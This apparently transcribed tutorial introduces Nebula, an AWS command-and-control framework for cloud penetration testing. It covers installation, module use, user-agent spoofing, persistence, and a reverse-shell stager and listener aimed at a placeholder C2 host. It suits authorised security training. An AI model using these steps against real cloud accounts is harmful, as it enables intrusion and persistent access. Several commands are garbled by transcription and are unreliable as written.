Nebula is a cloud command and control framework designed specifically for AWS security. It's a versatile tool that supports a range of penetration testing phases, including reconnaissance, enumeration, exploitation, and post-exploitation. While it is primarily focused on AWS, it is continuously expanding to other cloud providers and DevOps tools. Nebula is especially useful for cloud penetration testing due to its modular design, featuring over 60 modules that cater to various cloud tasks. These modules are designed to enhance your ability to discover and map out cloud environments, extract detailed information on resources, identify and exploit vulnerabilities, and manage persistence and cleanup operations. This makes Nebula an invaluable tool for comprehensive cloud security assessments. Nebula is packed with features to enhance your cloud security penetration testing. Starting with Reconnaissance, Nebula offers modules that help discover and map assets within your cloud environment. This provides a comprehensive view of your cloud infrastructure. For enumeration, you can extract detailed information on various cloud resources, such as EC2 instances, IAM roles, and S3 buckets, giving you deeper insights into the cloud setup. When it comes to exploitation, Nebula includes attack vectors specifically designed to exploit identified vulnerabilities within your cloud environment. This allows you to test the security posture effectively. Lastly, post-exploitation features include mechanisms for maintaining persistence and conducting cleanup operations, ensuring thorough testing and minimizing traces of the penetration test. These key features make Nebula a powerful tool for cloud security assessments. Let's now go over the installation steps for Nebula. Before we can install and set up Nebula, there are a few prerequisites we need to meet. Nebula requires Python 3.8 or higher and the Boto 3 library. It also needs Docker for containerized deployment. Lastly, you'll need your AWS and MongoDB credentials ready. Here are the steps for the installation. First, clone the Nebula repository to your local machine using this command: git clone /github.com/gl4sbo1 Nebula. Once you have the repository cloned, navigate into the directory and build the Docker container with the following command: docker build t nebula team server. After the build is complete, run the Docker container with this command: docker run -t nebula team server -dh database host -du database user -dp database password, dn database name -p team server password. Make sure to replace the placeholders with your actual database host, user, password, database name, and team server password. Following these steps will get Nebula up and running on your system, preparing you for the next phase of using the tool effectively. On this slide, we'll cover some basic commands for using Nebula. Understanding these commands is essential for effective module interaction within Nebula. To start, you can list all available modules by typing bash show modules. If you're looking for modules of a specific type, like enumeration or exploitation, you can filter them with bash show enum. This command will display all enumeration modules, making it easier to find what you're looking for. Once you've identified a module you want to use, the next step is to execute it. For example, to enumerate AWS EC2 instances, you would use bash use module enum AWS to ECC2 enum instances set instance ID 12034 run. This sequence of commands selects the specific module, sets required parameters, and then runs the module to retrieve the desired information. By mastering these basic commands, you'll be well equipped to navigate and utilize Nebula's wide range of modules effectively. Now, let's explore Nebula's modular architecture. Nebula is designed to be highly modular, enabling it to cover a broad range of tasks within cloud security. This architecture is organized into several module categories. First, we have reconnaissance modules, which focus on discovering cloud assets. These modules gather preliminary information about the cloud environment. Next, the enumeration category digs deeper, providing detailed information about specific cloud resources. For instance, it might enumerate EC2 instances, VPCs, or security groups. Exploitation modules are designed to identify and exploit vulnerabilities within the cloud infrastructure. These are used to understand how an attack could be carried out on identified vulnerabilities. Then, there's persistence. These modules involve post-exploitation tactics, allowing an attacker to maintain access and manipulate the cloud environment even after initial compromise. Some example modules we might encounter include enum EC2 instances. This module can list all instances, VPCs, and security groups within your cloud environment. IAM enumeration, useful for extracting detailed information about IAM roles, policies, and permissions, giving insights into user and permission configurations in the cloud. Understanding these categories and example modules helps us appreciate how Nebula organizes its capabilities to cover a comprehensive range of cloud security tasks. In this section, we're focusing on how to work with workspaces in Nebula. Workspaces are essential for organizing your output efficiently. To create a new workspace, you use the command create workspace name. Once created, you can switch to this workspace using use workspace name. Workspaces allow you to store outputs and session data in an organized manner, keeping your results segmented for better clarity. Additionally, you can effortlessly switch between different workspaces as needed, making it easier to manage various tasks and projects within Nebula. In this section, we're going to focus on configuring and customizing Nebula, particularly when it comes to user agent customization. You can set custom user agents for HTTP requests to match specific requirements or emulate different environments. For instance, you can set the user agent to Windows using the command set user agent Windows. You can check the current user agent with show user agent. If you need to revert to the default Bodo 3 user agent, you can simply unset the custom user agent with unset user agent. Customizing user agents allows you to fine-tune how your requests appear to target servers, providing flexibility and control over your interactions. In this segment, we're focusing on advanced operations within Nebula, specifically setting up a reverse shell. To begin, we'll use the Stager module to generate a reverse shell. Start by initiating the module with the command use module stager AWS Python TCP. Next, you'll need to configure the connection by setting the control server's IP address and port using set host C2 server IP and set port C2 port. Once configured, execute the module by running the run command. Next, we need to set up a listener to capture the reverse shell. We achieve this by using the listener module. Start with the command use module s python TCP listener. Set the host to listen on all interfaces using set host 0.0.0 and configure the port with set port C2 port. Finally, start the listener with the run command. These steps allow you to establish a reverse shell connection for advanced interaction with the target system. When using Nebula, it's important to adhere to ethical guidelines and best practices. Firstly, always obtain permission before conducting any tests. Unauthorized testing can lead to legal issues and unintended consequences. Secondly, use Nebula in controlled environments to prevent any accidental damage to production systems. This helps ensure your testing is safe and contained. From a security standpoint, it's vital to keep both Nebula and its dependencies up to date. Regular updates help mitigate vulnerabilities and secure your testing framework. Additionally, continuously monitor for any unauthorized access or misuse to maintain control and integrity during your penetration testing activities. To summarize, Nebula is a powerful tool designed specifically for cloud penetration testing, with a focus on AWS environments. It features a wide variety of modules that cover different stages of the attack lifecycle, providing you with a comprehensive toolkit for identifying vulnerabilities and ensuring cloud security. As for the next steps, we encourage you to explore the advanced modules that Nebula offers, tailoring your setup to meet specific needs. Additionally, you can contribute to the ongoing development of Nebula by participating in its project community. This engagement not only helps the tool evolve, but also enhances your expertise and network within the cybersecurity community. Let's take a look at some useful references and further reading to deepen your understanding of cloud penetration testing with Nebula. Firstly, I recommend checking out the Nebula GitHub repository, where you can find the latest updates, documentation, and contribute to the tool's development. Another essential resource is the book Hands-on AWS Penetration Testing with Kali Linux, which provides practical insights and exercises to enhance your skills. Lastly, for supplementary tools, explore Paku and Scout Suite. These tools offer complementary functionalities that can enrich your AWS security toolkit.